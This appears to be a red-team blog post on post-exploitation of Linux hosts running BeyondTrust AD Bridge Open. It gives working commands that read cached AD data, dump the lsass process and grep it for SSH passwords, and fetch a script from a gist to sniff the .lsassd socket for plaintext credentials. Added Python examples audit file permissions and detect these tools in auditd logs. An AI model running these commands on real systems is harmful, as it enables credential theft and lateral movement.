<!DOCTYPE html>
<html lang="en">
<title>BeyondTrust AD Bridge Open Post-Exploitation | vibrio&#39;s personal infosec blog</title>
<meta http-equiv="cache-control" content="no-cache">
<meta http-equiv="expires" content="0">
<meta http-equiv="pragma" content="no-cache">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="AD Bridge Open is an open-source community project sponsored by BeyondTrust Corporation. It is essentially a wrapper application that will facilitate the int...">
<meta name="author" content="vibrio">
<meta name="generator" content="Jekyll v3.9.3">
<link rel="canonical" href="https://blog.vibri.us/BeyondTrust-AD-Bridge-Open-Post-Exploitation/">
<link rel="stylesheet" href="/assets/css/minimal.css">
<link rel="stylesheet" href="/assets/css/classes.css">
<link rel="stylesheet" href="/assets/css/sidebar.css" media="screen and (min-width: 70em)">
<link rel="alternate" href="/feed.xml" type="application/atom+xml" title="vibrio's personal infosec blog">
<article>
<header>
<h1><a href="/BeyondTrust-AD-Bridge-Open-Post-Exploitation/">BeyondTrust AD Bridge Open Post-Exploitation</a></h1><time datetime="2023-03-15T00:00:00+00:00">March 15, 2023</time>
</header>
<p><a href="https://github.com/BeyondTrust/pbis-open">AD Bridge Open</a> is an open-source community project sponsored by BeyondTrust Corporation. It is essentially a wrapper application that will facilitate the integration of *nix hosts with Microsoft Active Directory (sets up Kerberos and LDAP Auth).</p>
<p><strong>This post describes a few post-exploitation tips for the case where root access has already been obtained on a Linux host that uses BeyondTrust AD Bridge Open.</strong></p>
<p>The content is based on the last open-source version available on GitHub (AD Bridge Open 9.1.0.551); the project was discontinued and moved to a closed-source enterprise model in 2021.</p>
<h2 id="builtin-binaries-and-files-for-situational-awareness">Builtin binaries and files for situational awareness</h2>
<p>AD Bridge Open installs and uses several binaries that are very useful for enumerating an Active Directory environment, in particular if the Linux box has been streamlined and has no LDAP or SMB clients installed (those are typically present on Linux distributions).</p>
<p>The software keeps a cache of domain users and their associated Active Directory attributes in the file <code class="language-plaintext highlighter-rouge">/var/lib/pbis/db/lsass-adcache.filedb.DOMAIN.LOCAL</code>.</p>
<p>So, without sending a single request to the Domain Controllers, it is possible to access a trove of useful information about the AD environment.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-1.png" />
</p>
<p>Another interesting file is <code class="language-plaintext highlighter-rouge">/var/lib/pbis/db/lwi_events.db</code>. If Active Directory has been hardened and the Machine Account Quota is set to zero for all regular domain accounts, reading this file reveals the domain account that was used to join the Linux machine to the domain, again without making a single request to the Domain Controllers.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-2.png" />
</p>
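<p>A defender's check to go with the two database files above, as an added example that is not part of this post or of AD Bridge Open: the script walks the state directory (the post's <code>/var/lib/pbis/</code>, which also holds the Unix sockets covered further down) and reports every regular file that users other than root can read and every socket that group or world can connect to, so a world-readable copy of the AD cache is caught before a local, unprivileged user finds it. The default path and file names come from the post; <code>build_sample_tree()</code> creates a constructed stand-in tree so the audit can be run offline.</p>

```python
"""Audit what AD Bridge Open leaves on disk under /var/lib/pbis.

Added example for this post, not part of AD Bridge Open.  Reports regular
files readable by anyone other than root and Unix sockets that group or
world may write to (and therefore connect to).  The default path is the
one from the post; build_sample_tree() builds a constructed stand-in.
"""
import os
import socket
import stat
import tempfile
from typing import Dict, List

PBIS_STATE_DIR = "/var/lib/pbis"


def classify(path: str, st: os.stat_result) -> List[str]:
    """Findings for one entry; an empty list means nothing to report."""
    mode = stat.S_IMODE(st.st_mode)
    findings = []
    if stat.S_ISSOCK(st.st_mode):
        # connect() on a Unix socket needs write permission on the node
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append(f"socket {path} connectable beyond owner (mode {mode:04o})")
    elif stat.S_ISREG(st.st_mode):
        if mode & stat.S_IROTH:
            findings.append(f"file {path} world-readable (mode {mode:04o})")
        elif mode & stat.S_IRGRP and st.st_gid != 0:
            findings.append(f"file {path} readable by gid {st.st_gid} (mode {mode:04o})")
    return findings


def audit_pbis_dir(root: str = PBIS_STATE_DIR) -> Dict[str, List[str]]:
    """Walk root and return {path: [findings]} for entries with findings.
    A missing or unreadable directory yields an empty dict."""
    results: Dict[str, List[str]] = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:              # os.walk lists sockets with the files
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except FileNotFoundError:
                continue                # raced with lsassd recreating a socket
            found = classify(path, st)
            if found:
                results[path] = found
    return results


def build_sample_tree() -> str:
    """Constructed stand-in for /var/lib/pbis: one cache DB left
    world-readable, one locked down, and a socket node anyone may connect to."""
    root = tempfile.mkdtemp(prefix="pbis-audit-")
    db = os.path.join(root, "db")
    os.mkdir(db)
    for name, mode in (("lsass-adcache.filedb.EXAMPLE.LOCAL", 0o644),
                       ("lwi_events.db", 0o600)):
        path = os.path.join(db, name)
        with open(path, "wb") as fh:
            fh.write(b"constructed placeholder, not a real database\n")
        os.chmod(path, mode)
    sock_path = os.path.join(root, ".lsassd")
    listener = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    listener.bind(sock_path)            # creates the socket node on disk
    listener.close()                    # the node stays until unlinked
    os.chmod(sock_path, 0o666)
    return root


if __name__ == "__main__":
    target = PBIS_STATE_DIR if os.path.isdir(PBIS_STATE_DIR) else build_sample_tree()
    report = audit_pbis_dir(target)
    if not report:
        print(f"{target}: nothing readable or connectable beyond root")
    for path in sorted(report):
        for line in report[path]:
            print(line)
```

<p>Run as root on a real host it audits <code>/var/lib/pbis</code> directly; elsewhere it falls back to the constructed tree so the output format can be seen. Group-readable files are only reported when the group is not root's, which keeps the expected <code>root:root 0640</code> layout quiet.</p>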
<p>As for useful LOLBINs for enumeration and situational awareness, they can all be found in the directory <code class="language-plaintext highlighter-rouge">/opt/pbis/bin/</code>.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-3.png" />
</p>
<p>These are pretty much self-explanatory:</p>
<ul>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-groups</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-members</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-objects</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/enum-users</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/list-groups-for-user</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-by-sid</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-group-by-id</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-group-by-name</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-objects</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-user-by-id</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/find-user-by-name</code></li>
<li><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/ldapsearch</code></li>
</ul>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/get-dc-list DOMAIN.LOCAL</code> outputs the names and IPs of all Domain Controllers.</p>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/adtool</code> can query and modify objects in Active Directory, e.g. add user or computer accounts.</p>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/update-dns</code> registers IP addresses and the corresponding PTR records in DNS via a secure dynamic DNS update, which could be handy for ADIDNS zone poisoning.</p>
<p><code class="language-plaintext highlighter-rouge">/opt/pbis/bin/lwio-copy</code> is an SMB client that can be used to transfer files.</p>
<p>You can find more details about each binary's function, command flags and so on in the <a href="https://www.beyondtrust.com/docs/ad-bridge/getting-started/linux-admin/index.htm">official documentation</a>.</p>
<h2 id="domain-credentials-for-lateral-movement-and-privilege-escalation">Domain credentials for lateral movement and privilege escalation</h2>
<p>As with any pentesting or red teaming engagement I want to obtain Domain credentials to move laterally and/or escalate privileges.</p>
<p>Since SSH authentication is integrated with Active Directory through AD Bridge Open, I can dump the LSASS process memory, run strings on it and grep for SSH authentications and/or passwords.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-4.png" />
</p>
<p>GDB can be attached using one of the AD Bridge Open binaries:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/opt/pbis/bin/lwsm gdb lsass
</code></pre></div></div>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-5.png" />
</p>
<p>Or I can just run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcore <span class="sb">`</span>ps aux | <span class="nb">grep</span> <span class="s1">'[l]sass'</span> | <span class="nb">awk</span> <span class="s1">'{print $2}'</span><span class="sb">`</span> <span class="o">&amp;&amp;</span> strings core.<span class="k">*</span> | <span class="nb">grep</span> <span class="nt">-C</span> 8 <span class="nt">-Hnia</span> <span class="nt">--color</span><span class="o">=</span>auto <span class="s2">"ssh"</span>
</code></pre></div></div>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-6.png" />
</p>
<p>The only issue with this method is that it is a bit hit-and-miss with the grep “offsets” (the <code class="language-plaintext highlighter-rouge">-C</code> context lines): sometimes I get the user credential within those lines, other times I get nothing and the credential is somewhere else inside the ~1 GB memory dump file.</p>
<p>So I decided to look again at the files used by AD Bridge Open, and found several Unix sockets in the directory <code class="language-plaintext highlighter-rouge">/var/lib/pbis/</code>.</p>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-7.png" />
</p>
<p><code class="language-plaintext highlighter-rouge">.lsassd</code> appeared interesting, so I decided to sniff its traffic.</p>
<p>I’ll need to install wireshark/tcpdump and socat, and then run a small bash script to accomplish this.</p>
<p>Since I have to wait for an SSH connection, I’m going to run everything from a Tmux session. That way I can detach it and leave it running.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>yum <span class="nt">-y</span> <span class="nb">install </span>wireshark socat tmux
tmux
wget https://gist.githubusercontent.com/ricardojba/05d8ca06717292798054ca968082b70a/raw/5eea101b9054b19aa21714b2cbcbc5bc2173cdf4/unixsock-sniff.sh <span class="nt">-O</span> unixsock-sniff.sh
<span class="nb">chmod </span>755 unixsock-sniff.sh
./unixsock-sniff.sh <span class="nt">-u</span> /var/lib/pbis/.lsassd
</code></pre></div></div>
<p>If the Linux box is often accessed by users, or some automated scanning software performs authenticated scans against it (e.g. Nessus), I can quickly capture an SSH login and the plain-text password.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>tshark <span class="nt">-x</span> <span class="nt">-r</span> /tmp/unix_socket_dump.pcap | <span class="nb">grep</span> <span class="nt">-C</span> 8 sshd
</code></pre></div></div>
<p align="center">
<img src="/assets/posts/2023-03-15-BeyondTrust-AD-Bridge-Open-Post-Exploitation/z_pbis-8.png" />
</p>
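<p>Both credential-harvesting routes above (attaching a debugger or <code>gcore</code> to lsass, and sniffing the <code>.lsassd</code> socket) leave a process-execution trail, which is the natural place to detect them. The following is an added example written for this post, not code from the author or from BeyondTrust: it parses auditd <code>EXECVE</code> records (assuming an audit rule that logs <code>execve</code>) and tags executions of the memory-dump tools, of anything other than AD Bridge itself touching <code>/var/lib/pbis/</code>, and of the enumeration and modification binaries under <code>/opt/pbis/bin/</code> listed earlier. The sample records are constructed; the command lines they contain are the ones shown in the post.</p>

```python
"""Tag auditd EXECVE records that match the tooling used in this post.

Added example, not from the post's author or from BeyondTrust.  Assumes a
Linux audit rule that records execve (e.g. `-a always,exit -F arch=b64
-S execve -k exec`).  /opt/pbis/bin, /var/lib/pbis and `lwsm gdb lsass`
come from the post; the sample records at the bottom are constructed.
"""
import re
from typing import Dict, List, Optional

PBIS_BIN = "/opt/pbis/bin/"    # AD Bridge Open binaries
PBIS_STATE = "/var/lib/pbis/"  # cache databases and the lsassd socket

# Binaries from the post, grouped by what they do against the domain.
RECON_TOOLS = {"enum-groups", "enum-members", "enum-objects", "enum-users",
               "list-groups-for-user", "find-by-sid", "find-group-by-id",
               "find-group-by-name", "find-objects", "find-user-by-id",
               "find-user-by-name", "ldapsearch", "get-dc-list"}
WRITE_TOOLS = {"adtool", "update-dns", "lwio-copy"}

EXECVE_RE = re.compile(
    r"type=EXECVE msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\):(?P<rest>.*)")
ARG_RE = re.compile(r'\ba(?P<idx>\d+)=(?P<val>"[^"]*"|[0-9A-Fa-f]+)')


def decode_arg(raw: str) -> str:
    """auditd quotes plain arguments and hex-encodes those containing
    spaces, quotes or control characters; return the decoded text."""
    if raw.startswith('"'):
        return raw[1:-1]
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    except ValueError:
        return raw


def parse_execve(line: str) -> Optional[Dict]:
    """One EXECVE record -> {ts, serial, argv}; None for any other type."""
    m = EXECVE_RE.match(line.strip())
    if not m:
        return None
    args = {int(a.group("idx")): decode_arg(a.group("val"))
            for a in ARG_RE.finditer(m.group("rest"))}
    return {"ts": float(m.group("ts")), "serial": int(m.group("serial")),
            "argv": [args[i] for i in sorted(args)]}


def classify_argv(argv: List[str]) -> Optional[str]:
    """Return an alert tag for argv, or None when it is not of interest."""
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]
    rest = argv[1:]
    in_pbis = argv[0].startswith(PBIS_BIN)
    if prog == "lwsm" and "gdb" in rest:   # debugger on the auth service
        return "memdump:lwsm-gdb"
    if prog == "gcore":
        return "memdump:gcore"
    # `gdb ./binary` is routine on a dev box; attaching to a live process is not
    if prog == "gdb" and any(a in ("-p", "--pid") or a.startswith("--pid=")
                             for a in rest):
        return "memdump:gdb-attach"
    if prog in WRITE_TOOLS:
        return "ad-modify:" + prog
    # the OpenLDAP client is also called ldapsearch; count only the AD Bridge copy
    if prog in RECON_TOOLS and (in_pbis or prog != "ldapsearch"):
        return "ad-recon:" + prog
    # anything but AD Bridge itself touching its state dir: sniffers, scripts, copies
    if not in_pbis and any(PBIS_STATE in a for a in argv):
        return "pbis-state-access:" + prog
    return None


def scan(lines) -> List[Dict]:
    """Parse EXECVE records and return the matching ones with a tag added."""
    hits = []
    for line in lines:
        rec = parse_execve(line)
        if rec is None:
            continue
        tag = classify_argv(rec["argv"])
        if tag:
            rec["tag"] = tag
            hits.append(rec)
    return hits


# Constructed sample records in auditd's EXECVE format.  The third carries a
# hex-encoded argument (auditd's form for arguments containing a space).
SAMPLE_LOG = "\n".join([
    'type=EXECVE msg=audit(1678838400.101:3001): argc=3 a0="/opt/pbis/bin/lwsm" a1="gdb" a2="lsass"',
    'type=EXECVE msg=audit(1678838400.102:3002): argc=2 a0="gcore" a1="1234"',
    'type=EXECVE msg=audit(1678838400.103:3003): argc=3 a0="sh" a1="-c" a2='
    + "./unixsock-sniff.sh -u /var/lib/pbis/.lsassd".encode().hex().upper(),
    'type=EXECVE msg=audit(1678838400.104:3004): argc=2 a0="/opt/pbis/bin/get-dc-list" a1="EXAMPLE.LOCAL"',
    'type=EXECVE msg=audit(1678838400.105:3005): argc=1 a0="/opt/pbis/bin/adtool"',
    'type=EXECVE msg=audit(1678838400.106:3006): argc=3 a0="systemctl" a1="status" a2="sshd"',
    'type=SYSCALL msg=audit(1678838400.107:3007): arch=c000003e syscall=59 success=yes',
])

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f'{hit["serial"]} {hit["tag"]}: {" ".join(hit["argv"])}')
```

<p>The <code>memdump</code> and <code>ad-modify</code> tags are rarely noise on a server and can page directly; <code>ad-recon</code> fires on legitimate administration too and is better kept for enrichment. Correlating the record's serial with the matching <code>SYSCALL</code> record supplies the calling uid, which this example leaves out.</p>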
<p>I'm pretty sure there's a lot I didn't cover or missed, but this should help get us started in a pentest or red team engagement on *nix hosts with BeyondTrust AD Bridge Open installed.</p>
</article>
</html>
